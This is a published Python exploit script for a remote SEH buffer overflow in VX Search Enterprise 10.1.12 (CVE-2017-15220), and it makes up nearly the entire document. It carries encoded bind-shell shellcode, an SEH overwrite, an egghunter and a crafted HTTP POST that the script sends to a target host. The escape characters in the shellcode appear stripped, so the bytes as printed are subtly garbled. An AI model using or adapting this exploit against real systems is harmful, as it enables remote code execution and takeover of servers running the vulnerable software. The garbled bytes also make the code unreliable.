VX Search Enterprise 10.1.12 Buffer Overflow
Posted on 12 October 2017
#!/usr/bin/env python # Exploit Title : VX Search Enterprise v10.1.12 Remote Buffer Overflow # Exploit Author : Revnic Vasile # Email : revnic[at]gmail[dot]com # Date : 09-10-2017 # Vendor Homepage : http://www.flexense.com/ # Software Link : http://www.vxsearch.com/setups/vxsearchent_setup_v10.1.12.exe # Version : 10.1.12 # Tested on : Windows 7 x86 Pro SP1 # Category : Windows Remote Exploit # CVE : CVE-2017-15220 import socket import os import sys import struct # msfvenom -p windows/shell_bind_tcp LPORT=4444 EXITFUN=none -e x86/alpha_mixed -f c shellcode = ("x89xe5xdbxd3xd9x75xf4x5fx57x59x49x49x49x49x49" "x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a" "x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32" "x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49" "x39x6cx68x68x6fx72x55x50x77x70x53x30x43x50x4d" "x59x79x75x66x51x69x50x45x34x6cx4bx32x70x70x30" "x4cx4bx32x72x64x4cx6ex6bx56x32x66x74x6ex6bx72" "x52x75x78x36x6fx4ex57x33x7ax57x56x54x71x4bx4f" "x4ex4cx65x6cx65x31x73x4cx44x42x56x4cx75x70x5a" "x61x38x4fx36x6dx63x31x4fx37x5ax42x58x72x63x62" "x70x57x6ex6bx42x72x44x50x4cx4bx73x7ax45x6cx6e" "x6bx72x6cx44x51x72x58x78x63x33x78x35x51x48x51" "x42x71x6cx4bx43x69x37x50x77x71x5ax73x4cx4bx67" "x39x77x68x5ax43x66x5ax53x79x4ex6bx74x74x4cx4b" "x43x31x39x46x70x31x6bx4fx6ex4cx39x51x78x4fx46" "x6dx53x31x38x47x55x68x39x70x72x55x7ax56x33x33" "x33x4dx4bx48x35x6bx61x6dx74x64x50x75x4ax44x31" "x48x4cx4bx46x38x56x44x73x31x69x43x50x66x4cx4b" "x46x6cx72x6bx4cx4bx73x68x67x6cx43x31x4bx63x4c" "x4bx46x64x4ex6bx76x61x48x50x4cx49x71x54x34x64" "x35x74x63x6bx71x4bx71x71x36x39x31x4ax46x31x39" "x6fx6dx30x43x6fx73x6fx32x7ax6ex6bx74x52x68x6b" "x6cx4dx43x6dx62x48x44x73x44x72x77x70x65x50x33" "x58x73x47x30x73x56x52x43x6fx31x44x61x78x62x6c" "x53x47x74x66x35x57x59x6fx4ax75x6fx48x4ex70x45" "x51x47x70x57x70x65x79x6fx34x71x44x62x70x43x58" "x46x49x4fx70x30x6bx53x30x59x6fx6ax75x72x4ax33" "x38x53x69x46x30x4bx52x69x6dx73x70x32x70x51x50" "x32x70x31x78x4ax4ax36x6fx49x4fx4bx50x39x6fx49" "x45x4ex77x31x78x75x52x75x50x57x61x53x6cx6bx39" "x7ax46x63x5ax54x50x71x46x32x77x43x58x6bx72x49" "x4bx76x57x53x57x39x6fx38x55x46x37x42x48x38x37" "x48x69x57x48x49x6fx59x6fx58x55x73x67x75x38x44" "x34x68x6cx57x4bx69x71x59x6fx7ax75x51x47x6ex77" "x50x68x50x75x72x4ex52x6dx51x71x6bx4fx4ax75x31" "x78x52x43x70x6dx52x44x67x70x4fx79x78x63x71x47" "x43x67x33x67x75x61x68x76x62x4ax55x42x70x59x56" "x36x7ax42x59x6dx53x56x38x47x32x64x61x34x45x6c" "x76x61x35x51x6cx4dx57x34x34x64x74x50x6bx76x43" "x30x50x44x30x54x52x70x50x56x53x66x53x66x42x66" "x46x36x70x4ex30x56x53x66x72x73x30x56x31x78x33" "x49x38x4cx65x6fx4dx56x4bx4fx59x45x4bx39x79x70" "x32x6ex73x66x33x76x6bx4fx30x30x31x78x65x58x6f" "x77x67x6dx31x70x79x6fx38x55x6dx6bx6ax50x4ex55" "x69x32x30x56x33x58x4cx66x4ex75x4dx6dx4dx4dx59" "x6fx38x55x37x4cx57x76x33x4cx54x4ax6dx50x6bx4b" "x4bx50x32x55x53x35x4dx6bx63x77x57x63x73x42x32" "x4fx52x4ax37x70x51x43x4bx4fx58x55x41x41") buf_totlen = 5000 dist_seh = 2492 nseh = "xebx06AA" seh = 0x1011369e nops = "x90" * 10 egghunter = ("x66x81xCAxFFx0Fx42x52x6Ax02x58xCDx2Ex3Cx05x5Ax74xEFxB8" "x77x30x30x74" "x8BxFAxAFx75xEAxAFx75xE7xFFxE7") egg = "w00tw00t" payload = "" payload += "A"*(dist_seh - len(payload)) payload += nseh payload += struct.pack("<I", seh) payload += nops payload += egghunter payload += egg payload += shellcode payload += "D"*(buf_totlen - len(payload)) buf = "POST /../%s HTTP/1.1 " %payload buf += "Host: 10.10.10.10 " buf += "User-Agent: Mozilla/5.0 " buf += "Connection: close " buf += " " print "Sending the payload!" expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) expl.connect(("10.10.10.10", 80)) expl.send(buf) expl.close()